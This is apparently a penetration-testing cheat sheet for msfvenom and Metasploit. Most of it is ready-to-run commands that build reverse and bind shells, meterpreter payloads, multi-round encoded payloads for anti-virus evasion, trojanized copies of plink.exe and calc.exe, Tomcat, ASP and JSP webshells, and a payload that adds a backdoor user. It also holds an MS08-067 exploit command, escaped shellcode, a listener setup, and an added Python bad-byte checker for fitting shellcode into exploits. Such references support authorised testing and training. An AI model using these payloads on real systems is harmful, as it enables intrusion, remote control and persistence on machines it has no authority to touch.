General commands with Msfvenom
List all payload types (around 562):
msfvenom -l payloads
Show only Windows x64 payloads:
msfvenom -l payloads --platform windows --arch x64
Show the output formats (asp, exe, php, powershell, js_le, csharp, …):
msfvenom --list formats
Difference between staged and non-staged payloads
In msfvenom we can choose between staged and non-staged payloads, but what are they?
Non-staged payloads are standalone: the whole payload is sent to the target at once. Advantage: less communication with the target, which makes it easier to avoid detection.
Staged payloads are sent in two stages: the first stage loads a small dropper (stager) that connects back, and the second stage delivers the actual payload. Advantages: 1) if the buffer in an overflow is too small to hold a non-staged payload, splitting it in two helps; 2) having several parts also helps against host anti-virus detection.
Payloads generation with Msfvenom
Windows binary payloads
Generate C code for a Windows target with a TCP reverse shell connecting back to host $LOCALIP:443 (non-staged payload):
msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f c
Generate C code for a Windows target with a TCP reverse shell connecting back to host $LOCALIP:443 (staged payload):
msfvenom -p windows/shell/reverse_tcp LHOST=$LOCALIP LPORT=443 -f c
Generate C code for a TCP reverse shell to host $LOCALIP:443, encoding (obfuscating) the payload with x86/shikata_ga_nai so that the shellcode avoids the bad chars \x00\x0a\x0d:
msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
Generate C code for a TCP reverse shell to host $LOCALIP:443, encoded and avoiding the bad chars \x00\x0a\x0d, with EXITFUNC=thread so that the shellcode exits only its own thread when it finishes and does not crash the main process:
msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
Generate a JavaScript (little-endian) payload that executes a reverse shell against host $LOCALIP on port 443, with no encoding (-e generic/none):
msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f js_le -e generic/none
Generate a Windows EXE whose shellcode executes a reverse shell against host $LOCALIP on port 4444 (TCP). The output is written to shell_reverse.exe:
msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -o shell_reverse.exe
Generate a Windows EXE whose shellcode executes a reverse shell against host $LOCALIP on port 4444 (TCP), encoding the shellcode with 9 rounds of x86/shikata_ga_nai. The output is written to shell_reverse_msf_encoded.exe:
msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe
Trojanize plink.exe to execute a reverse shell against host $LOCALIP:4444 (TCP) using 9 rounds of encoding, writing the output EXE to shell_reverse_msf_encoded_embedded.exe:
msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
Generate an EXE file called met_https_reverse.exe that executes a reverse shell over HTTPS (port 443) to a listening meterpreter handler on host $LOCALIP:
msfvenom -p windows/meterpreter/reverse_https LHOST=$LOCALIP LPORT=443 -f exe -o met_https_reverse.exe
Trojanize plink.exe with an encoded meterpreter reverse shell over HTTP (port 80) against host $LOCALIP, writing the output to /var/www/daaa118.exe:
msfvenom -p windows/meterpreter/reverse_http LHOST=$LOCALIP LPORT=80 -f exe -e x86/shikata_ga_nai -x /usr/share/windows-binaries/plink.exe -o /var/www/daaa118.exe
Trojanize calc.exe to execute a meterpreter reverse shell against host $LOCALIP, keeping the template's original behaviour (-k), saved in file calc_2.exe:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP -f exe -k -x calc.exe -o calc_2.exe
Generate a file meterpreter.exe containing a meterpreter reverse shell against host $LOCALIP on port TCP/443:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP LPORT=443 -f exe -o meterpreter.exe
Warning: when using the -x parameter, the template executable must not be UPX compressed.
Trojanize plink.exe with an encoded meterpreter reverse shell against host $LOCALIP on port TCP/443, written to plink-meterpreter.exe:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP LPORT=443 -f exe -x /usr/share/windows-binaries/plink.exe -e x86/shikata_ga_nai -o plink-meterpreter.exe
Exploit MS08-067 (NetAPI vulnerability) on host $IP and run a bind shell after exploitation:
msfcli windows/smb/ms08_067_netapi RHOST=$IP PAYLOAD=windows/shell/bind_tcp E
Generate a Python payload that executes calc.exe, avoiding the NULL byte \x00:
msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f py
Create a file account.exe, encoded with 20 rounds, containing a payload that creates the user hack3r with password s3cret^s3cret:
msfvenom -p windows/adduser -f exe -o account.exe USER=hack3r PASS=s3cret^s3cret -e x86/shikata_ga_nai -i 20
Trojanized DLL calc.dll that executes calc.exe:
msfvenom -p windows/exec CMD=calc.exe -f dll -o calc.dll
Windows service executable (exe-service format) that executes calc.exe:
msfvenom -p windows/exec CMD=calc.exe -f exe-service
Windows service executable, encoded with 20 rounds, that creates a new user hack3r with password s3cret^s3cret:
msfvenom -p windows/adduser -f exe-service -o service.exe USER=hack3r PASS=s3cret^s3cret -e x86/shikata_ga_nai -i 20
Linux binary payloads
Generate C code for a bind shell for a Linux target on port TCP/4444, avoiding the bad chars \x00\x0a\x0d\x20 and encoding the shellcode:
msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai
Staged ELF shared library (.so) payload with a reverse shell:
msfvenom -p linux/x86/shell/reverse_tcp LHOST=$LOCALIP LPORT=443 -o staged.out -f elf-so
Non-staged ELF shared library (.so) payload with a reverse shell:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -o non-staged.out -f elf-so
Get the shellcode's assembler listing (raw output piped into ndisasm):
msfvenom -p linux/x86/exec cmd=whoami R | ndisasm -u -
Payload size: 42 bytes
00000000 6A0B push byte +0xb
00000002 58 pop eax
00000003 99 cdq
00000004 52 push edx
00000005 66682D63 push word 0x632d
00000009 89E7 mov edi,esp
0000000B 682F736800 push dword 0x68732f
00000010 682F62696E push dword 0x6e69622f
00000015 89E3 mov ebx,esp
00000017 52 push edx
00000018 E807000000 call 0x24
0000001D 7768 ja 0x87
0000001F 6F outsd
00000020 61 popa
00000021 6D insd
00000022 6900575389E1 imul eax,[eax],dword 0xe1895357
00000028 CD80 int 0x80
Get the shellcode as a \x-escaped string, ready to embed in a Python/Perl exploit:
msfvenom -p linux/x86/exec cmd=whoami R | hexdump -v -e '"\\\x" 1/1 "%02x"'
Payload size: 42 bytes
\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7
\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89
\xe3\x52\xe8\x07\x00\x00\x00\x77\x68\x6f\x61
\x6d\x69\x00\x57\x53\x89\xe1\xcd\x80
Webshells generation with Msfvenom
Tomcat webshell with a meterpreter reverse shell against host $LOCALIP:
msfvenom -p java/meterpreter/reverse_tcp -f war -o tomcatapp.war LHOST=$LOCALIP
Tomcat webshell with a standalone reverse shell against host $LOCALIP on port 442:
msfvenom -p java/shell_reverse_tcp -f war -o tomcatapp2.war LHOST=$LOCALIP LPORT=442
ASP webshell on Windows:
msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f asp -o webshell_reverse_msfvenom.txt
JSP webshell on Linux:
msfvenom -p linux/x86/shell/reverse_tcp LHOST=$LOCALIP LPORT=443 -o test.jsp -f jsp
-v payload: sets the variable name used for the payload in the generated code (e.g. payload instead of the default buf). Very useful when replacing the existing payload in an existing exploit.
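Before dropping generated shellcode into an existing exploit (the situation the -v note describes), check it against that exploit's bad-char list: the 42-byte linux/x86/exec blob shown above was generated without -b and still contains NULL bytes. This added example is not from the original page; it parses the \x-escaped hexdump format shown above together with a -b style specification, cross-checks the byte count against the "Payload size" header, and reports the offset of every forbidden byte (a specification that lost its backslashes, such as "x00", is rejected).

```python
import re
from typing import Dict, List, Optional

# Constructed from the 42-byte hexdump output shown above
# (linux/x86/exec cmd=whoami, generated without -b).
SHELLCODE_ESCAPED = (
    r"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7"
    r"\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89"
    r"\xe3\x52\xe8\x07\x00\x00\x00\x77\x68\x6f\x61"
    r"\x6d\x69\x00\x57\x53\x89\xe1\xcd\x80"
)

_ESC = re.compile(r"\\x([0-9a-fA-F]{2})")


def unescape(text: str) -> bytes:
    """Convert \\xNN text (msfvenom -f c/py output, the hexdump output above,
    or a -b value) into raw bytes; anything that is not a \\xNN escape is an error."""
    leftovers = _ESC.sub("", text).strip(" \t\r\n\"'")
    if leftovers:
        raise ValueError(f"not a \\xNN escape sequence: {leftovers!r}")
    return bytes(int(h, 16) for h in _ESC.findall(text))


def find_badchars(shellcode: bytes, badchars: bytes) -> Dict[int, List[int]]:
    """Map each forbidden byte value to the offsets where it occurs."""
    hits: Dict[int, List[int]] = {}
    for offset, value in enumerate(shellcode):
        if value in badchars:
            hits.setdefault(value, []).append(offset)
    return hits


def check(text: str, badchar_spec: str,
          expected_size: Optional[int] = None) -> Dict[int, List[int]]:
    """Decode the blob, compare its length with the 'Payload size' header
    printed by msfvenom, and scan it for the bytes listed in badchar_spec."""
    shellcode = unescape(text)
    if expected_size is not None and len(shellcode) != expected_size:
        raise ValueError(f"decoded {len(shellcode)} bytes, header said {expected_size}")
    return find_badchars(shellcode, unescape(badchar_spec))


if __name__ == "__main__":
    # The blob above: 0x00 at offsets 15, 26, 27, 28 and 35.
    for value, offsets in sorted(check(SHELLCODE_ESCAPED, r"\x00\x0a\x0d", 42).items()):
        print(f"bad char 0x{value:02x} at offsets {offsets}")
```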
Using Metasploit to wait for a reverse shell
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 443
set LHOST $LOCALIP
exploit